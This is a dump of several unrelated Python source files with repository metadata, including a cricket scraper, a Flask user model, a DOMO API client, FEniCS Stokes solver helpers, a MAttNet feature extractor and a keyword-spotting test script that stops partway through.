from espncricinfo.exceptions import MatchNotFoundError, NoScorecardError
from espncricinfo.match import Match
bigbash_article_link = "http://www.espncricinfo.com/ci/content/series/1128817.html?template=fixtures"
r = requests.get(bigbash_article_link)
bigbash_article_html = r.text
soup = BeautifulSoup(bigbash_article_html, "html.parser")
bigbash1_items = soup.find_all("span",{"class": "fixture_date"})
bigbash_items = soup.find_all("span",{"class": "play_team"})
bigbash_article_dict = {}
date_dict = {}
# for div in bigbash_items:
# a = div.find('a')['href']
# bigbash_article_dict[div.find('a').string] = a
# #print(bigbash_article_dict)
i=0
s = {}
x = {}
date = []
match = []
for div in bigbash1_items:
i+=1
if i %2 ==0:
s = div.string.strip("\xa0local\n\r\t")
elif i %2 !=0:
x = div.string.strip("\xa0local\n\r\t")
print(s)
#print(bigbash_article_dict)
#date_dict[div.find('span').string] = a
| [
"[email protected]"
] | |
253ae191cd0f7b4a9542a3e4dbf7368054f1663f | 9d71864d602e986abd6e3d2aaeee04a5895826ef | /models/user.py | 0fb800f5ec637c749120cd5b0b56a342281b0f68 | [] | no_license | aquashash/Flask-RESTAPI | 52a31f626f4e6be60252b98b942324a1931f9e3a | 41ddb2852eb6e407e6cb8bd787d368187ea5a5b9 | refs/heads/master | 2020-03-19T08:35:03.282892 | 2018-06-11T21:11:06 | 2018-06-11T21:11:06 | 136,217,199 | 0 | 0 | null | null | null | null | UTF-8 | Python | false | false | 616 | py | from db import db
class UserModel(db.Model):
__tablename__ ='users'
id = db.Column(db.Integer, primary_key=True)
username = db.Column(db.String(80))
password = db.Column(db.String(80))
def __init__(self, username, password):
self.username = username
self.password = password
@classmethod
def find_by_username(cls, username):
return cls.query.filter_by(username=username).first()
@classmethod
def find_by_id(cls, _id):
return cls.query.filter_by(id=_id).first()
def save_to_db(self):
db.session.add(self)
db.session.commit() | [
"[email protected]"
] | |
71fafd03f6f060dcac59aadfa5d2a031fe0e6ee8 | c040b64e299e3455eb066531e75266a47045ef34 | /nn/my_keras/pic_martix.py | 3b21ce71164036aaecb7527205953db66fbaf1e7 | [] | no_license | helloexp/ml | f0e67d0360ae4860b289247db3c0a902566f088c | c3e96ae948759eaa6011041b6d5281a1e9073959 | refs/heads/master | 2020-04-16T18:22:39.498282 | 2018-12-20T10:31:27 | 2018-12-20T10:31:27 | null | 0 | 0 | null | null | null | null | UTF-8 | Python | false | false | 569 | py | # encoding:utf-8
from PIL import Image
from pylab import *
class ImageOperation(object):
def __init__(self,size):
self.size=size
def array_2_image(self,data):
image = Image.fromarray(data)
return image
def image_2_array(self,filename):
image = Image.open(filename)
return array(image)
if __name__ == '__main__':
operation = ImageOperation((128,128))
array = operation.image_2_array("../resource/cat.jpeg")
print(array)
image = operation.array_2_image(array)
image.show()
show() | [
"[email protected]"
] | |
2f75d64a1469c372ddd1d7953bca677b0823bc49 | 6ff2a44be083550c5c96aa4637c338cad672b8fd | /05_알고리즘/190905/숫자배열회전.py | cd30fd8b712bc33aee670dc484db357677fdcbd4 | [] | no_license | hyunhee418/TIL | 447ed9735b3cf8f8c68a985248aefb80ee415f5c | cac85a9207ae03cb7f4b060b5d0b79e55ca78c19 | refs/heads/master | 2023-01-10T15:20:49.841630 | 2021-01-05T10:41:05 | 2021-01-05T10:41:05 | 195,916,255 | 0 | 0 | null | 2023-01-05T05:00:18 | 2019-07-09T02:17:47 | Jupyter Notebook | UTF-8 | Python | false | false | 489 | py | import sys
sys.stdin = open('input_ro.txt', 'r')
for tc in range(1, int(input())+1):
N = int(input())
arr = [list(map(int, input().split())) for _ in range(N)]
d1 = []
for i in range(N):
for s in range(N-1, -1, -1):
print(arr[s][i], end='')
print(end=' ')
for j in range(N - 1, -1, -1):
print(arr[N-i-1][j], end='')
print(end=' ')
for h in range(N):
print(arr[h][N-i-1], end='')
print() | [
"[email protected]"
] | |
2523cadd05a1cb3f943dcfbff1e4624cd49663e4 | ea9c6173d17a366a925d0339c0ed97350dc479ac | /griot/griot/__init__.py | 13f21637e745569ddcb097a778582a8cfc87cd87 | [
"MIT"
] | permissive | JeffreyMFarley/Bailiwick | 039263a23de095ca920161d9a9a2be71bcaf5261 | 0533b2398aaaa69c15c7d6b8a50290d92513fbbf | refs/heads/main | 2021-07-01T02:14:35.241835 | 2019-11-16T19:00:16 | 2019-11-16T19:00:16 | 98,752,948 | 0 | 0 | null | null | null | null | UTF-8 | Python | false | false | 154 | py | from griot.compile import *
from griot.fine_tune import *
from griot.enrich import *
from griot.lemma_inflections import *
from griot.participle import *
| [
"[email protected]"
] | |
e6cd52859f6674708efc0f38b3e0b4f2a9a9150b | ac8d43147308180531cc1d9757378b65c0db59c9 | /domo_query/__init__.py | d499044cc865a41b68b0670f897af164538c8326 | [] | no_license | JediHero/domo-query | 4867954d2b6f023e8f024c92c9199713a4a24fb6 | 98d2556286361a7c34a019d68fe086dbb0e859a3 | refs/heads/master | 2022-04-05T22:01:50.866997 | 2020-03-06T01:08:43 | 2020-03-06T01:08:43 | 243,444,365 | 0 | 0 | null | null | null | null | UTF-8 | Python | false | false | 5,702 | py | """Provides a Connection class with a tables property providing metadata for datasets
where the user credentials has share permissions or is marked as the owner. Also provides
query method used to pull/export data from DOMO.
"""
__version__ = '0.1.0'
# Standard library
import dataclasses as dc
import typing as tp
# 3rd party
import requests
@dc.dataclass
class Connection:
"""Interface for the domo_query package. The Connection object is lazy meaning
that properties are populated on their first use.
This library requires a 'Client' to be created at developer.domo.com.
1. Go to developer.domo.com.
2. Sign into your domain.
3. Under My Account select New Client.
4. Scope must be data.
The 'Client ID' and 'Secret' are required parameters when instantiating the Connection class.
Once the class is instantiated, properties are calculated as they are used.
conn = Connection(YOUR_CLIENT_ID, YOUR_SECRET)
conn.tables returns a list of dict objects where each dict contains an 'id' and 'name' key.
The 'id' or 'name' can be used to run queries.
The sql paramter of the 'query' method will always be selected from the 'table' table.
For example, 'select * from table' is the default query provided if sql=''.
Results can be limited by passing 'select * from table limit 10'.
Columns and rows can be specified using normal sql select and where clauses.
"""
client_id: str
secret: str
auth_url: str=dc.field(init=False, default="https://api.domo.com/oauth/token?grant_type=client_credentials&scope=data")
query_url: str=dc.field(init=False, default="https://api.domo.com/v1/datasets")
_login: dict=dc.field(init=False, default_factory=dict)
_tables: tp.List[tp.Dict]=dc.field(init=False, default_factory=list)
_last_id_or_name: str=dc.field(init=False, default="")
@property
def login(self) -> tp.Dict:
"""Returns the Authorization header specified in the DOMO API."""
if self._login:
return self._login
auth = requests.auth.HTTPBasicAuth(self.client_id, self.secret)
# authenticate
response = requests.get(self.auth_url, auth=auth)
# get token and return basic header
token = response.json()["access_token"]
header = dict(Authorization = f"bearer {token}")
self._login = header
return self._login
@property
def tables(self) -> tp.List[tp.Dict]:
"""Return a list of datasets in the domain. Each item in the list contains
metadata about the dataset such as name, owner, rows, columns, etc. The login
used to create the 'Client ID' and 'Secret' must have share permissions or be the owner
of the datasets returned.
"""
if self._tables:
return self._tables
header = self.login # authenticate
limit = 50 # barch size to fetch each loop
offset = 0 # set state variable
datasets = [] # holds metadata for datasets
# requests datasets in groups of limit
while True:
# set url
url = f"{self.query_url}?offset={offset}&limit={limit}"
# get next group of datasets
chunk = requests.get(url, headers=header).json()
if not chunk: break
# append chunk to master list
datasets.extend(chunk)
# increment state
offset += limit
self._tables = datasets
return self._tables
def find_table(self, id_or_name: str) -> str:
"""Takes the name or id of the DOMO dataset and returns metadata for the
matching dataset. This method is used to obtain the id_or_name parameter in the
'query' method.
"""
for table in self.tables:
if table["name"] == id_or_name:
self._last_id_or_name = table
return self._last_id_or_name
elif table["id"] == id_or_name:
self._last_id_or_name = table
return self._last_id_or_name
def query(self, sql: str="", id_or_name: str="") -> tp.List[dict]:
"""Returns the results of a query on a DOMO dataset. The results are
formatted as a list of dict objects where each record is a dict where
keys are columns.
1. If id_or_name is not provided, the last id_or_name value is used.
2. If the query method has never been useed, the id_or_name must be passed.
This value can be
obtained using the find_table method.
3. If 'sql' is not provided the default will be 'select * from table'.
All 'sql' statements must select from the 'table' table.
"""
# authenticate
header = self.login
# add json type
header['Accept'] = 'application/json'
# create params
sql = sql or "select * from table"
if id_or_name and self._last_id_or_name:
id = self._last_id_or_name["id"]
elif not id_or_name and not self._last_id_or_name:
raise ValueError("Must provide Dataset ID or Name.")
else:
self.find_table(id_or_name)
id = self._last_id_or_name["id"]
query = {"sql":sql}
url = f"{self.query_url}/query/execute/{id}?includeHeaders=true"
# get query results
response = requests.post(
url,
headers=header,
json=query
).json()
# format result as a list of dicts
columns = response["columns"]
rows = response["rows"]
data = [
dict(zip(columns, row))
for row in rows
]
return data | [
"[email protected]"
] | |
df0dfd2a32259bbda334dd63b38dccfdae71d234 | 968bef5b48bbef32f8193ec727e1d03f9a5b7f2c | /PyOpdb/NCBI_API/url.py | c3bf70470635b24af00438b6cfe214c8a857a068 | [
"Apache-2.0"
] | permissive | felixlyd/OPDB | fa015c5e8f11b07d954baee7477ad14b2150d808 | d5d9c9ce5239037dcc57abba6377abbfccec32d1 | refs/heads/master | 2021-08-08T21:42:40.687918 | 2017-11-11T09:59:13 | 2017-11-11T09:59:13 | null | 0 | 0 | null | null | null | null | UTF-8 | Python | false | false | 699 | py | import urllib.request
def connect_url(url, decode):
"""
:method: a method to perfect urllib.request.connect()
:param url: string
:param decode: string like "utf-8"
:return: string(the url content)
"""
req = urllib.request.Request(url)
response = urllib.request.urlopen(req)
html = response.read()
html = html.decode(decode)
return html
def callback(block, block_size, total_size):
"""
:method: a method to print download schedule
:param block:
:param block_size:
:param total_size:
:return:
"""
percent = 100.0 * block * block_size / total_size
if percent > 100:
percent = 100
print("%.2f%%" % percent)
| [
"[email protected]"
] | |
9d9d3c3fe04320ef1567b9e330e2d820c0821128 | 781e2692049e87a4256320c76e82a19be257a05d | /all_data/exercism_data/python/kindergarten-garden/db2bf8388b6a4719a608a3d1a55324fe.py | b8ddc9ee8420f927cdf2119620fcf6bacdaaef8f | [] | no_license | itsolutionscorp/AutoStyle-Clustering | 54bde86fe6dbad35b568b38cfcb14c5ffaab51b0 | be0e2f635a7558f56c61bc0b36c6146b01d1e6e6 | refs/heads/master | 2020-12-11T07:27:19.291038 | 2016-03-16T03:18:00 | 2016-03-16T03:18:42 | 59,454,921 | 4 | 0 | null | 2016-05-23T05:40:56 | 2016-05-23T05:40:56 | null | UTF-8 | Python | false | false | 1,034 | py | _default_students = tuple(sorted(('Alice', 'Bob', 'Charlie',
'David', 'Eve', 'Fred',
'Ginny', 'Harriet', 'Ileana',
'Joseph', 'Kincaid', 'Larry')))
_plant_dict = {'C': 'Clover', 'G': 'Grass', 'R': 'Radishes', 'V': 'Violets'}
def _letter_to_plant(c):
return _plant_dict[c]
class Garden():
def __init__(self, plant_rows, students=None):
self.plant_rows = ''.join(c for c in plant_rows
if c in _plant_dict.keys() or c == '\n')
try:
self.students = tuple(sorted(students))
except TypeError:
self.students = _default_students
def plants(self, child):
plant_index = 2 * self.students.index(child)
plant_rows = [map(_letter_to_plant,
line[plant_index:plant_index + 2])
for line in self.plant_rows.split('\n')]
return list(plant for row in plant_rows for plant in row)
| [
"[email protected]"
] | |
b1b6b6d014c0760a3d03c521469bd08581b22e5c | 6a07e15db24f819c1001409eb35b1813438f506c | /fem.py | 98e900b145c15514e36bad0ec1dcefd8dff362ef | [
"MIT"
] | permissive | domischi/StokesFEM | 62005812402768be320c961d2ef879591ad64eac | 3925e23253ac6d2c0444fb4b09f8f9176d4eaa44 | refs/heads/master | 2021-04-02T19:02:20.751323 | 2020-09-04T00:36:31 | 2020-09-04T00:36:31 | 248,309,653 | 0 | 0 | null | null | null | null | UTF-8 | Python | false | false | 2,050 | py | from dolfin import *
def left_right (x, on_boundary, L): return x[0] > L * (1-DOLFIN_EPS) or x[0] < L * (-1+DOLFIN_EPS)
def top_bottom (x, on_boundary, L): return x[1] > L * (1-DOLFIN_EPS) or x[1] < L * (-1+DOLFIN_EPS)
def get_function_space(_config, mesh):
# Build function space
P2 = VectorElement("Lagrange", mesh.ufl_cell(), _config['degree_fem_velocity']) ## For the velocity
P1 = FiniteElement("Lagrange", mesh.ufl_cell(), _config['degree_fem_pressure']) ## For the pressure
TH = P2 * P1 ## Taylor-Hood elements
return FunctionSpace(mesh, TH) ## on the mesh
def get_general_bcs(_config, W):
bcs = []
L = _config['L']
# No-slip boundary conditions
if _config['no_slip_top_bottom']:
noslip = Constant((0.0, 0.0))
bcs.append(DirichletBC(W.sub(0), noslip, lambda x, on_boundary: top_bottom(x, on_boundary, L)))
if _config['no_slip_left_right']:
noslip = Constant((0.0, 0.0))
bcs.append(DirichletBC(W.sub(0), noslip, lambda x, on_boundary: left_right(x, on_boundary, L)))
# No penetration into wall
if (not _config['no_slip_top_bottom']) and _config['no_penetration_top_bottom']:
bcs.append(DirichletBC(W.sub(0).sub(1), Constant(0.), lambda x, on_boundary: top_bottom(x, on_boundary, L)))
if (not _config['no_slip_left_right']) and _config['no_penetration_left_right']:
bcs.append(DirichletBC(W.sub(0).sub(0), Constant(0.), lambda x, on_boundary: left_right(x, on_boundary, L)))
return bcs
def solve_stokes(_config, assemble_system):
mesh, W, A, P, bb = assemble_system(_config)
# Create Krylov solver and AMG preconditioner
solver = KrylovSolver(_config['krylov_method'], "amg")
solver.parameters.update( { 'absolute_tolerance' : 1e-9, 'relative_tolerance' : 1e-9, 'maximum_iterations' : 1000, })
# Associate operator (A) and preconditioner matrix (P)
solver.set_operators(A, P)
# Solve
U = Function(W)
solver.solve(U.vector(), bb)
# Get sub-functions
u, p = U.split()
return u, p, mesh
| [
"[email protected]"
] | |
b72172fdca7b5d967c5302c25916cae83caff034 | 181594187b476f0c24ced2ee1256f1ccc20b5edd | /Day4/sleep.py | 3d6cdc72a3c02954dc048be092e9479eaf338c18 | [] | no_license | Negative-Feedback/AOC_2018 | 10ebc371cbc62fd923721f75036e14b8950aac51 | ba5053a062863409f8ab4babfacb553e783588d0 | refs/heads/master | 2020-04-26T00:19:29.726118 | 2019-03-18T15:01:44 | 2019-03-18T15:01:44 | 173,173,737 | 0 | 0 | null | null | null | null | UTF-8 | Python | false | false | 3,283 | py | import re
# function to calculate the total time spent asleep
def calcSleepTime(minutes):
total = 0
for x in minutes:
total += x
return total
# function to calculate the minute they were asleep on the most
def calcSleepMin(minutes):
bMin = -1
for i in range(len(minutes)):
if bMin == -1:
bMin = i
elif minutes[bMin] <= minutes[i]:
bMin = i
return bMin
# function to find the gaurd who is asleep the most and the minute they are asleep on the most
def part_one(arr, ids):
bestID = -1
bestMin = -1
sleepTime = -1
corrID = False
for id in ids: # loop through the array of ids
minutes = [0 for x in range(0, 60)] # gaurds are only asleep between 00:00 - 00:59 so this array represents the minutes
# regex to identify the correct enteries
query = re.compile("^Guard #" + str(id) + " begins shift$")
for i in range(len(arr)): # loop through the array of entries
if query.search(arr[i][1]):
corrID = True
elif re.search("falls asleep", arr[i][1]) and corrID:
# stripping the mintues out of the entries
start = int(str(arr[i][0])[14:16])
end = int(str(arr[i+1][0])[14:16])
for i in range(start,end): #increment the minutes they are asleep
minutes[i] +=1
else:
corrID = False
testSleepTime = calcSleepTime(minutes) # calculate the total time spent asleep
if bestID == -1 and bestMin == -1:
sleepTime = testSleepTime
bestID = id
bestMin = calcSleepMin(minutes)
elif sleepTime < testSleepTime:
sleepTime = testSleepTime
bestID = id
bestMin = calcSleepMin(minutes)
print("ID: {} Minute: {} Sleep Time: {}".format(bestID, bestMin, sleepTime))
# function to find the gaurd who is asleep the most and the minute they are asle
def part_two(arr, ids):
bestID = -1
bestMin = -1
numTimes = -1
corrID = False
for id in ids: # loop through the array of ids
minutes = [0 for x in range(0, 60)] # gaurds are only asleep between 00:
# regex to identify the correct enteries
query = re.compile("^Guard #" + str(id) + " begins shift$")
for i in range(len(arr)): # loop through the array of entries
if query.search(arr[i][1]):
corrID = True
elif re.search("falls asleep", arr[i][1]) and corrID:
# stripping the mintues out of the entries
start = int(str(arr[i][0])[14:16])
end = int(str(arr[i+1][0])[14:16])
for i in range(start,end+1): #increment the minutes they are asleep
minutes[i] +=1
else:
corrID = False
BMin = calcSleepMin(minutes)
NTime = minutes[BMin]
if bestID == -1 and bestMin == -1 and numTimes == -1:
bestID = id
bestMin = BMin
numTimes = NTime
elif numTimes < NTime:
bestID = id
bestMin = BMin
numTimes = NTime
print("ID: {} Minute: {} Num Times: {}".format(bestID, bestMin, numTimes)) | [
"[email protected]"
] | |
e4ac7949001c3a782ee66c9e353af4d7b37f1de9 | b2e4f2a9d8fabf3f667dfc2141e96af1f342f5b2 | /tools/extract_mrcn_ref_feats.py | fdb39c7217d3bf71e20243759435578adab89a23 | [
"MIT"
] | permissive | ChopinSharp/MAttNet | ba927d80f15c0b99105540d40809cad2f08d36d4 | 3d82fe08ad5526665d0478aee08c5113d79cc209 | refs/heads/master | 2021-08-08T05:48:01.993261 | 2020-08-11T04:58:12 | 2020-08-11T04:58:12 | 227,971,922 | 1 | 1 | MIT | 2019-12-14T05:35:02 | 2019-12-14T05:35:01 | null | UTF-8 | Python | false | false | 4,508 | py | from __future__ import absolute_import
from __future__ import division
from __future__ import print_function
import argparse
import os
import os.path as osp
import sys
import json
import time
import numpy as np
import h5py
import pprint
from scipy.misc import imread, imresize
import cv2
import torch
from torch.autograd import Variable
# mrcn path
import _init_paths
from mrcn import inference_no_imdb
# dataloader
# HERE
from loaders.ref_loader import RefLoader
# box functions
def xywh_to_xyxy(boxes):
"""Convert [x y w h] box format to [x1 y1 x2 y2] format."""
return np.hstack((boxes[:, 0:2], boxes[:, 0:2] + boxes[:, 2:4] - 1))
def xyxy_to_xywh(boxes):
"""Convert [x1 y1 x2 y2] box format to [x y w h] format."""
return np.hstack((boxes[:, 0:2], boxes[:, 2:4] - boxes[:, 0:2] + 1))
def image_to_head(head_feats_dir, image_id):
"""Returns
head: float32 (1, 1024, H, W)
im_info: float32 [[im_h, im_w, im_scale]]
"""
feats_h5 = osp.join(head_feats_dir, str(image_id)+'.h5')
feats = h5py.File(feats_h5, 'r')
head, im_info = feats['head'], feats['im_info']
return np.array(head), np.array(im_info)
def det_to_pool5_fc7(mrcn, det, net_conv, im_info):
"""
Arguments:
det: object instance
net_conv: float32 (1, 1024, H, W)
im_info: float32 [[im_h, im_w, im_scale]]
Returns:
pool5: Variable (cuda) (1, 1024)
fc7 : Variable (cuda) (1, 2048)
"""
box = np.array([det['box']]) # [[xywh]]
box = xywh_to_xyxy(box) # [[x1y1x2y2]]
pool5, fc7 = mrcn.box_to_pool5_fc7(Variable(torch.from_numpy(net_conv).cuda()), im_info, box) # (1, 2048)
# fc7 = fc7.mean(3).mean(2)
return pool5, fc7
def main(args):
dataset_splitBy = args.dataset + '_' + args.splitBy
if not osp.isdir(osp.join('cache/feats/', dataset_splitBy)):
os.makedirs(osp.join('cache/feats/', dataset_splitBy))
# Image Directory
if 'coco' or 'combined' in dataset_splitBy:
IMAGE_DIR = 'data/images/mscoco/images/train2014'
elif 'clef' in dataset_splitBy:
IMAGE_DIR = 'data/images/saiapr_tc-12'
else:
print('No image directory prepared for ', args.dataset)
sys.exit(0)
# load dataset
data_json = osp.join('cache/prepro', dataset_splitBy, 'data.json')
data_h5 = osp.join('cache/prepro', dataset_splitBy, 'data.h5')
## HERE
id_str = '%s_%s_%s_%d' % (args.m, args.tid, dataset_splitBy, args.top_N)
dets_json = osp.join('cache/detections', dataset_splitBy, 'matt_dets_%s.json' % id_str)
loader = RefLoader(data_json, data_h5, dets_json)
images = loader.images
dets = loader.dets
num_dets = len(dets)
assert sum([len(image['det_ids']) for image in images]) == num_dets
# load mrcn model
mrcn = inference_no_imdb.Inference(args)
# feats_h5
# HERE
file_name = 'matt_feats_%s.h5' % id_str
feats_h5 = osp.join('cache/feats', dataset_splitBy, 'mrcn', file_name)
f = h5py.File(feats_h5, 'w')
fc7_set = f.create_dataset('fc7', (num_dets, 2048), dtype=np.float32)
pool5_set = f.create_dataset('pool5', (num_dets, 1024), dtype=np.float32)
# extract
feats_dir = '%s_%s_%s' % (args.net_name, args.imdb_name, args.tag)
head_feats_dir=osp.join('cache/feats/', dataset_splitBy, 'mrcn', feats_dir)
for i, image in enumerate(images):
image_id = image['image_id']
net_conv, im_info = image_to_head(head_feats_dir, image_id)
det_ids = image['det_ids']
for det_id in det_ids:
det = loader.Dets[det_id]
det_pool5, det_fc7 = det_to_pool5_fc7(mrcn, det, net_conv, im_info)
det_h5_id = det['h5_id']
fc7_set[det_h5_id] = det_fc7.data.cpu().numpy()
pool5_set[det_h5_id] = det_pool5.data.cpu().numpy()
if i % 20 == 0:
print('%s/%s done.' % (i+1, len(images)))
f.close()
print('%s written.' % feats_h5)
if __name__ == '__main__':
parser = argparse.ArgumentParser()
parser.add_argument('--imdb_name', default='coco_minus_refer', help='image databased trained on.')
parser.add_argument('--net_name', default='res101')
parser.add_argument('--iters', default=1250000, type=int)
parser.add_argument('--tag', default='notime')
parser.add_argument('--dataset', type=str, default='refcoco', help='dataset name: refclef, refcoco, refcoco+, refcocog')
parser.add_argument('--splitBy', type=str, default='unc', help='splitBy: unc, google, berkeley')
parser.add_argument('--tid', type=str, required=True)
parser.add_argument('--top-N', type=int, default=8)
parser.add_argument('--m', type=str, required=True)
args = parser.parse_args()
main(args)
| [
"[email protected]"
] | |
450df24a0679c4015376c3e8d2f9ac476ba74b85 | c96735e137fde34ee3fab346c0c4e1e2e282cdb8 | /velkoz_web_application_django/dashboard_core/views.py | ad26600b9015bfe425dbb8cac9b65af3f7783344 | [
"MIT"
] | permissive | MatthewTe/velkoz_backend_applications | ff6a382f40a8b1113740cd5fd3e590566b892935 | 023dbcfbf64a79316e389b109e8a2069a2a8f7cc | refs/heads/main | 2023-01-21T23:24:24.976751 | 2020-11-30T03:31:07 | 2020-11-30T03:31:07 | 303,871,012 | 0 | 0 | null | null | null | null | UTF-8 | Python | false | false | 1,472 | py | from django.shortcuts import render
# Importing database models:
from .models import ExternalDatabase
# Main index/home page:
def main_index(request):
"""
The main index method is used to render the main html template for the django
project that summarizes the status of all the connected external databases.
The main purpose of this view is to query the django database for all instances
of the ‘ExternalDatabase’ model. It then passes this QuerySet to the django html
template. The reason this view function is so bare-bones is because most of the
summary information that is to be displayed on the main_index.html page is related
to the ‘ExternalDatabase’ model and is dynamically rendered by the template.
This means that most of the logic for the main index page of the site is stored
and performed in the actual django template itself.
Args:
request (http request): The http request that is sent to the server from
the client.
Returns:
django.shortcuts.render: The django template rendered as html with full
context.
"""
# Querying database for all instances of ExternalDatabase objects:
all_external_databases = ExternalDatabase.objects.all()
# Building context to pass to template:
context = {
'external_databases' : all_external_databases
}
return render(request, "dashboard_core/main_index.html", context=context)
| [
"[email protected]"
] | |
64ee8b22eff52784e22e086e13d62ef9fbf0f99e | 7a71a046ec75a1a8b33465371cea21f393bf2102 | /untitled folder/numbers.py | ae82f4a02b2bddded09389e0d149229b276a4772 | [] | no_license | huda88/ALGO | a23cb5d66a2abdb58454c4f342385d72c5776b20 | 86d664f9d7ec9940ebfdad2e5ff943ffb6c00c65 | refs/heads/master | 2021-01-19T16:50:20.467957 | 2015-05-05T08:48:44 | 2015-05-05T08:48:44 | 35,088,231 | 0 | 0 | null | null | null | null | UTF-8 | Python | false | false | 406 | py | import sys
A=[]
for line in sys.stdin:
for word in line.strip().split():
A.append(int(word))
total = 0
mi = A[0]
ma = A[0]
for x in range(len(A)):
number = (A[x])
total += number
if number < mi:
mi = number
elif number > ma:
ma = number
average = float(total) /len(A)
print ("minimum:" , mi, '\n'
"maximum:" , ma, '\n'
"average:" , average) | [
"[email protected]"
] | |
827e3cb4d173d05081ecd59185cc57b8c17ceb51 | 7f0fc279a87cce4a50d726103559ba596cc578dd | /my_test_pb.py | 1014305d272c09c423d428f3e1c0873e8cfce3f5 | [
"Apache-2.0"
] | permissive | yylcandy/ML-KWS-for-MCU | c0bac93e547f3806dfd4bae180e471cb2278eb87 | 83657bb7ea7847cd7d61ba5a039a365d1379f0f8 | refs/heads/master | 2020-08-09T15:40:00.089097 | 2019-10-17T09:55:13 | 2019-10-17T09:55:13 | 214,116,889 | 0 | 0 | null | null | null | null | UTF-8 | Python | false | false | 11,364 | py | # Copyright 2017 The TensorFlow Authors. All Rights Reserved.
#
# Licensed under the Apache License, Version 2.0 (the "License");
# you may not use this file except in compliance with the License.
# You may obtain a copy of the License at
#
# http://www.apache.org/licenses/LICENSE-2.0
#
# Unless required by applicable law or agreed to in writing, software
# distributed under the License is distributed on an "AS IS" BASIS,
# WITHOUT WARRANTIES OR CONDITIONS OF ANY KIND, either express or implied.
# See the License for the specific language governing permissions and
# limitations under the License.
# ==============================================================================
#
# Modifications Copyright 2017-18 Arm Inc. All Rights Reserved.
# Adapted from freeze.py to run inference on train/val/test dataset on the
# trained model in the form of pb
#
#
from __future__ import absolute_import
from __future__ import division
from __future__ import print_function
import argparse
import os.path
import sys
import tensorflow as tf
import input_data
import models
from tensorflow.contrib.framework.python.ops import audio_ops as contrib_audio
from tensorflow.python.ops import io_ops
def load_graph(filename):
"""Unpersists graph from file as default graph."""
with tf.gfile.FastGFile(filename, 'rb') as f:
graph_def = tf.GraphDef()
graph_def.ParseFromString(f.read())
tf.import_graph_def(graph_def, name='')
def wav2Input(filename, model_settings):
#print('wav2Input ', filename)
desired_samples = model_settings['desired_samples']
foreground_volume=1
time_shift_padding=[[0, 0], [0, 0]]
time_shift_offset=[0,0]
#background_data=0
#background_volume=0
wav_loader = io_ops.read_file(filename)
wav_decoder = contrib_audio.decode_wav(
wav_loader, desired_channels=1, desired_samples=desired_samples)
#scaled_foreground = tf.multiply(wav_decoder.audio, foreground_volume)
#padded_foreground = tf.pad(scaled_foreground, time_shift_padding, mode='CONSTANT')
#sliced_foreground = tf.slice(padded_foreground, time_shift_offset, [desired_samples, -1])
#background_mul = tf.multiply(background_data, background_volume)
#background_add = tf.add(background_mul, sliced_foreground)
background_clamp = tf.clip_by_value(wav_decoder.audio, -1.0, 1.0)
spectrogram = contrib_audio.audio_spectrogram(
background_clamp,
window_size=model_settings['window_size_samples'],
stride=model_settings['window_stride_samples'],
magnitude_squared=True)
mfcc= contrib_audio.mfcc(
spectrogram,
wav_decoder.sample_rate,
dct_coefficient_count=model_settings['dct_coefficient_count'])
mfcc=tf.clip_by_value(mfcc, -10.0, 127.0)
with tf.Session() as sess:
mfcc=sess.run(mfcc)
return mfcc
def run_inference_pb(wanted_words, sample_rate, clip_duration_ms,
window_size_ms, window_stride_ms, dct_coefficient_count,
model_architecture, model_size_info):
"""Creates an audio model with the nodes needed for inference.
Uses the supplied arguments to create a model, and inserts the input and
output nodes that are needed to use the graph for inference.
Args:
wanted_words: Comma-separated list of the words we're trying to recognize.
sample_rate: How many samples per second are in the input audio files.
clip_duration_ms: How many samples to analyze for the audio pattern.
window_size_ms: Time slice duration to estimate frequencies from.
window_stride_ms: How far apart time slices should be.
dct_coefficient_count: Number of frequency bands to analyze.
model_architecture: Name of the kind of model to generate.
model_size_info: Model dimensions : different lengths for different models
"""
tf.logging.set_verbosity(tf.logging.INFO)
sess = tf.InteractiveSession()
words_list = input_data.prepare_words_list(wanted_words.split(','))
model_settings = models.prepare_model_settings(
len(words_list), sample_rate, clip_duration_ms, window_size_ms,
window_stride_ms, dct_coefficient_count)
load_graph(FLAGS.graph)
audio_processor = input_data.AudioProcessor(
FLAGS.data_url, FLAGS.data_dir, FLAGS.silence_percentage,
FLAGS.unknown_percentage,
FLAGS.wanted_words.split(','), FLAGS.validation_percentage,
FLAGS.testing_percentage, model_settings)
softmax = sess.graph.get_tensor_by_name("labels_softmax:0")
label_count = model_settings['label_count']
ground_truth_input = tf.placeholder(
tf.float32, [None, label_count], name='groundtruth_input')
predicted_indices = tf.argmax(softmax, 1)
expected_indices = tf.argmax(ground_truth_input, 1)
correct_prediction = tf.equal(predicted_indices, expected_indices)
confusion_matrix = tf.confusion_matrix(
expected_indices, predicted_indices, num_classes=label_count)
evaluation_step = tf.reduce_mean(tf.cast(correct_prediction, tf.float32))
if(FLAGS.training):
# training set
set_size = audio_processor.set_size('training')
tf.logging.info('Training set size:%d', set_size)
total_accuracy = 0
total_conf_matrix = None
for i in range(0, set_size):
training_file, training_ground_truth = (
audio_processor.get_wav_files(1, i, model_settings, 'training'))
with open(training_file[0], 'rb') as wav_file:
training_data = wav_file.read()
training_accuracy, conf_matrix = sess.run(
[evaluation_step, confusion_matrix],
feed_dict={
'wav_data:0': training_data,
ground_truth_input: training_ground_truth,
})
total_accuracy += (training_accuracy) / set_size
if total_conf_matrix is None:
total_conf_matrix = conf_matrix
else:
total_conf_matrix += conf_matrix
tf.logging.info('Confusion Matrix:\n %s' % (total_conf_matrix))
tf.logging.info('Training accuracy = %.2f%% (N=%d)' % (total_accuracy * 100,
set_size))
'''
# validation set
set_size = audio_processor.set_size('validation')
tf.logging.info('Validation set size:%d', set_size)
total_accuracy = 0
total_conf_matrix = None
for i in range(0, set_size):
validation_file, validation_ground_truth = (
audio_processor.get_wav_files(1, i, model_settings, 'validation'))
#with open(validation_file[0], 'rb') as wav_file:
#validation_data = wav_file.read()
validation_data=wav2Input(validation_file[0], model_settings)
validation_accuracy, conf_matrix = sess.run(
[evaluation_step, confusion_matrix],
feed_dict={
'wav_data:0': validation_data,
ground_truth_input: validation_ground_truth,
})
total_accuracy += (validation_accuracy) / set_size
print(total_accuracy, '/', i)
if total_conf_matrix is None:
total_conf_matrix = conf_matrix
else:
total_conf_matrix += conf_matrix
tf.logging.info('Confusion Matrix:\n %s' % (total_conf_matrix))
tf.logging.info('Validation accuracy = %.2f%% (N=%d)' %
(total_accuracy * 100, set_size)) '''
# test set
set_size = audio_processor.set_size('testing')
tf.logging.info('Test set size:%d', set_size)
total_accuracy = 0
total_conf_matrix = None
